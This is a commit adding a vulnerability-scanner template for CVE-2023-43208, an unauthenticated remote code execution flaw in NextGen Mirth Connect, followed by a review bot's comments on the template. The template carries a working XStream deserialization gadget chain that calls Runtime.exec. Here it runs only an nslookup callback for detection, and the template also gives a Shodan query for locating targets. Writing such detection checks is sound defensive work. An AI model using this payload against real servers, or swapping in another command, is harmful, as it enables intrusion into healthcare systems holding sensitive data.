Create CVE-2023-43208.yaml
parent
1615bad02c
commit
7da719de3b
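--- a/CVE-2023-43208.yaml
+++ b/CVE-2023-43208.yaml
@@ -0,0 +1,106 @@
+id: CVE-2023-43208
+
+info:
+name: NextGen Healthcare Mirth Connect - Remote Code Execution
+author: princechaddha
+severity: critical
+description: Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1.
+impact: |
+Successful exploitation could result in unauthorized access and potential compromise of sensitive data.
+remediation: |
+Apply the vendor-supplied patch or upgrade to a non-vulnerable version.
+reference:
+- http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html
+- https://github.com/nvn1729/advisories
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+cvss-score: 9.8
+cve-id: CVE-2023-43208
+epss-score: 0.00349
+epss-percentile: 0.71422
+cpe: cpe:2.3:a:nextgen:mirth_connect:*:*:*:*:*:*:*:*
+metadata:
+vendor: nextgen
+product: mirth_connect
+shodan-query: title:"mirth connect administrator"
+tags: cve,cve2023,nextgen,rce
+
+http:
+- raw:
+- |
+GET /api/server/version HTTP/1.1
+Host: {{Hostname}}
+X-Requested-With: OpenAPI
+- |
+POST /api/users HTTP/1.1
+Host: {{Hostname}}
+X-Requested-With: OpenAPI
+Content-Type: application/xml
+
+<sorted-set>
+<string>abcd</string>
+<dynamic-proxy>
+<interface>java.lang.Comparable</interface>
+<handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">
+<target class="org.apache.commons.collections4.functors.ChainedTransformer">
+<iTransformers>
+<org.apache.commons.collections4.functors.ConstantTransformer>
+<iConstant class="java-class">java.lang.Runtime</iConstant>
+</org.apache.commons.collections4.functors.ConstantTransformer>
+<org.apache.commons.collections4.functors.InvokerTransformer>
+<iMethodName>getMethod</iMethodName>
+<iParamTypes>
+<java-class>java.lang.String</java-class>
+<java-class>[Ljava.lang.Class;</java-class>
+</iParamTypes>
+<iArgs>
+<string>getRuntime</string>
+<java-class-array/>
+</iArgs>
+</org.apache.commons.collections4.functors.InvokerTransformer>
+<org.apache.commons.collections4.functors.InvokerTransformer>
+<iMethodName>invoke</iMethodName>
+<iParamTypes>
+<java-class>java.lang.Object</java-class>
+<java-class>[Ljava.lang.Object;</java-class>
+</iParamTypes>
+<iArgs>
+<null/>
+<object-array/>
+</iArgs>
+</org.apache.commons.collections4.functors.InvokerTransformer>
+<org.apache.commons.collections4.functors.InvokerTransformer>
+<iMethodName>exec</iMethodName>
+<iParamTypes>
+<java-class>java.lang.String</java-class>
+</iParamTypes>
+<iArgs>
+<string>nslookup {{interactsh-url}}</string>
+</iArgs>
+</org.apache.commons.collections4.functors.InvokerTransformer>
+</iTransformers>
+</target>
+<methodName>transform</methodName>
+<eventTypes>
+<string>compareTo</string>
+</eventTypes>
+</handler>
+</dynamic-proxy>
+</sorted-set>
+
+matchers:
+- type: dsl
+dsl:
+- 'compare_versions(version, "<4.4.1")'
+- 'contains(interactsh_protocol, "dns")'
+- 'status_code_1 == 200 && status_code_2 == 500'
+condition: and
+
+extractors:
+- type: regex
+part: body_1
+name: version
+group: 1
+regex:
+- '(.*)'
+internal: true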
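Review bot: The `version` extractor at the end of the template captures with `- '(.*)'` on `body_1`, so the first line of whatever answers `/api/server/version` is passed to `compare_versions`; anchoring it to a version shape, for example `- '^(\d+\.\d+\.\d+)'`, keeps an error page or proxy banner that returns 200 from being treated as a version string. The `remediation` text is generic even though the description already names the fixed release; `Upgrade Mirth Connect to version 4.4.1 or later.` tells an operator what to do. The second request runs `nslookup` on the target, so this is an active check rather than a passive version probe, and the `description` should say so for teams scanning production Mirth instances.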